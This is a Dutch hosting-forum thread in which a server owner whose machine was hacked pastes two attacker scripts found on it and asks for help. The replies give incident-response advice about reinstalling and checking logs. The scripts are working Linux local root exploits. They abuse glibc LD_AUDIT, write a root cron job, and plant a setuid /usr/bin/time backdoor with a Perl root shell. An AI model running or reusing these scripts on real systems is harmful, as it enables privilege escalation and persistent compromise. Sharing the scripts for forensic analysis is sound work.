Likes Likes:  0
Resultaten 1 tot 4 van de 4
Geen
  1. #1
    Help, server offline wegens verdachte activiteit...
    geregistreerd gebruiker
    42 Berichten
    Ingeschreven
    27/08/11

    Locatie
    Wilsum / Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter

    Unhappy Help, server offline wegens verdachte activiteit...

    Hallo allemaal,

    Als beginneling liep ik gisteren tegen het feit dat mijn dedicated server offline was gehaald wegens "verdachte activiteit"...
    Nou daar sta je dan, waar te beginnen.

    Een paar dagen ervoor werd ik getriggerd door het feit dat er een aantal, niet door mij geplaatste, bestanden op de server stonden in een net nieuw aangemaakt account.
    Nu lijkt het erop dat men toegang heeft gekregen omdat ik, voor het online testen tijdens de bouw van een website, een te voor de hand liggend password heb aangemaakt...
    Weer wat geleerd... ;-)

    De bestanden die extra waren geplaatst zijn: psyBNC-2.3.2-7.tar.gz en expl2.tgz
    Deze waren ook reeds uitgepakt en hebben deze mappen aangemaakt met e.e.a. aan bestanden erin: psybnc en .g

    Toen de server weer online was, krijg ik maar 1 x de kans voor, heb ik als de donder overal een backup van gemaakt.
    Daarna direct het misbruikte account verwijderd.

    Nu is mijn vraag, wat kan er zoal gebeurd zijn, kan ik de installatie nog vertrouwen?
    Ik zal van 2 bestanden de code plaatsen, wellicht kan iemand daaruit afleiden wat er gebeurd is en hoe dit wellicht ongedaan te maken...

    bestand: ln.sh in de map .g

    Code:
    #!/bin/bash
    mkdir /tmp/ln
    ln /bin/ping /tmp/ln/target
    if [ ! -f /tmp/ln/target ];then 
    echo "Not vulnerable."
    exit
    fi
    exec 3< /tmp/ln/target
    rm -rf /tmp/ln/
    if [ ! -f /usr/bin/gcc ];then
    printf "Your version is - x86 - x64: "
    read VERS
    mv $VERS /tmp/ln
    chmod +x /tmp/ln
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    else
    gcc -w -fPIC -shared -o /tmp/ln x.c
    echo "In or out...."
    LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    fi
    Het bestand max.sh in map .g

    Code:
    #!/bin/sh
    # Cel Mai Simplu Exploit De La Max Pentru Ce Prosti .
    # Salutari Lu Sanders , Iasul , Register .
    
    CRONTAB=`date +%s`
    BASETMP=`mktemp`
    LOADER=${BASETMP}.sh
    ROOTPL="${CRONTAB}.pl"
    
    rm -f ${BASETMP}
    touch ${LOADER}
    
    PERL=`which perl`
    
    if [ ! -f ${PERL} ]; then
     echo "[*] Adica Ai Nevoie De Perl[*]"
     exit
    fi
    
    umask 0
    LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/${CRONTAB}" ping >/dev/null 2>&1
    umask 22
    
    if [ ! -f /etc/cron.d/${CRONTAB} ]; then
     echo "[*] Nu E Vulnerabil[*]"
     exit
    fi
    
    echo "* * * * * root /bin/bash ${LOADER}" > /etc/cron.d/${CRONTAB}
    
    echo "[*] Incerc Sa Iau Root /etc/cron.d/${CRONTAB}..."
    
    echo "rm -f /etc/cron.d/${CRONTAB}" > ${LOADER}
    echo "rm -f ${LOADER}" >> ${LOADER}
    echo "echo '#!${PERL}' > /etc/${ROOTPL}" >> ${LOADER}
    echo "echo '\$< = \$> = \$( = \$) = 0;' >> /etc/${ROOTPL}" >> ${LOADER}
    echo "echo 'undef %ENV; %ENV = (\"PATH\" => \"/bin:/usr/bin:/usr/sbin:/sbin\");' >> /etc/${ROOTPL}" >> $LOADER
    echo "echo 'system(\"/bin/bash -i\")' >> /etc/${ROOTPL}" >> ${LOADER}
    
    echo "chmod 755 /etc/${ROOTPL}" >> ${LOADER}
    echo "touch -r /usr/bin/time /etc/${ROOTPL}" >> ${LOADER}
    echo "chmod 4755 /usr/bin/time" >> ${LOADER}
    echo "touch -r /etc/${ROOTPL} /usr/bin/time" >> ${LOADER}
    chmod 755 ${LOADER}
    
    echo "[*] Nu Te Grabi Ca Nu E Usor..."
    while [ ! -f /etc/${ROOTPL} ]; do sleep 5; echo "    >> "`date`; done
    echo ""
    echo "[*] Back Dor Instalat"
    #chmod -s /usr/bin/time"
    #rm -f /etc/${ROOTPL}"
    echo ""
    
    echo ""
    echo "[*] Esti Uid 0 Bravo Mie Ca Prostu De Tine Nu Stie"
    echo ""
    
    /usr/bin/time ${PERL} /etc/${ROOTPL}
    
    chmod -s /usr/bin/time"
    rm -f /etc/${ROOTPL}"
    Ik hoop dat iemand me een beetje op weg kan helpen... ;-)
    Alvast heel hartelijk bedankt!

    Arne.
    Laatst gewijzigd door ArneK; 28/09/12 om 12:04.

  2. #2
    Help, server offline wegens verdachte activiteit...
    ICT Ready
    180 Berichten
    Ingeschreven
    02/11/10

    Locatie
    Helmond

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    14 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: 63849461
    Ondernemingsnummer: nvt

    Nou ja, je kan in ieder geval concluderen dat je server is gehackt en dat er verschillende software en scriptjes zijn geinstalleerd.

    Wat je het beste kunt doen is de server volledig backuppen en vervolgens een herinstallatie van het besturingssysteem plannen en uitvoeren. Ik denk dat dit het beste is omdat dit soort software zich vaak diep nestelt en verbergt in het besturinggsysteem.

    Edit: PsyBNC is overigens een 'bouncer' voor IRC. Dit is een applicatie dat fungeert als een proxy voor IRC servers.
    Laatst gewijzigd door BReady; 28/09/12 om 12:35.

  3. #3
    Help, server offline wegens verdachte activiteit...
    geregistreerd gebruiker
    8 Berichten
    Ingeschreven
    22/09/12

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Functie: Founder

    Citaat Oorspronkelijk geplaatst door BReady Bekijk Berichten
    Nou ja, je kan in ieder geval concluderen dat je server is gehackt en dat er verschillende software en scriptjes zijn geinstalleerd.

    Wat je het beste kunt doen is de server volledig backuppen en vervolgens een herinstallatie van het besturingssysteem plannen en uitvoeren. Ik denk dat dit het beste is omdat dit soort software zich vaak diep nestelt en verbergt in het besturinggsysteem.

    Edit: PsyBNC is overigens een 'bouncer' voor IRC. Dit is een applicatie dat fungeert als een proxy voor IRC servers.
    Als je de server gaat herinstalleren wordt je binnen no-time weer gehacked. Je moet eerst uit zien te vinden hoe je bent gehacked zodat je het lek kunt dichten.

    PsyBNC is inderdaad een bouncer, welke overigens zwaar verouderd is. Kijk even of je de psyBNC logs kunt vinden, misschien kan je de hacker achterhalen

  4. #4
    Help, server offline wegens verdachte activiteit...
    ICT Ready
    180 Berichten
    Ingeschreven
    02/11/10

    Locatie
    Helmond

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    14 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: 63849461
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door DediColo Bekijk Berichten
    Als je de server gaat herinstalleren wordt je binnen no-time weer gehacked. Je moet eerst uit zien te vinden hoe je bent gehacked zodat je het lek kunt dichten.

    PsyBNC is inderdaad een bouncer, welke overigens zwaar verouderd is. Kijk even of je de psyBNC logs kunt vinden, misschien kan je de hacker achterhalen
    Daarom zeg ik, maak een volledige backup zodat je in de logbestanden altijd terug kunt vinden waar en hoe het probleem ontstaan is.

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics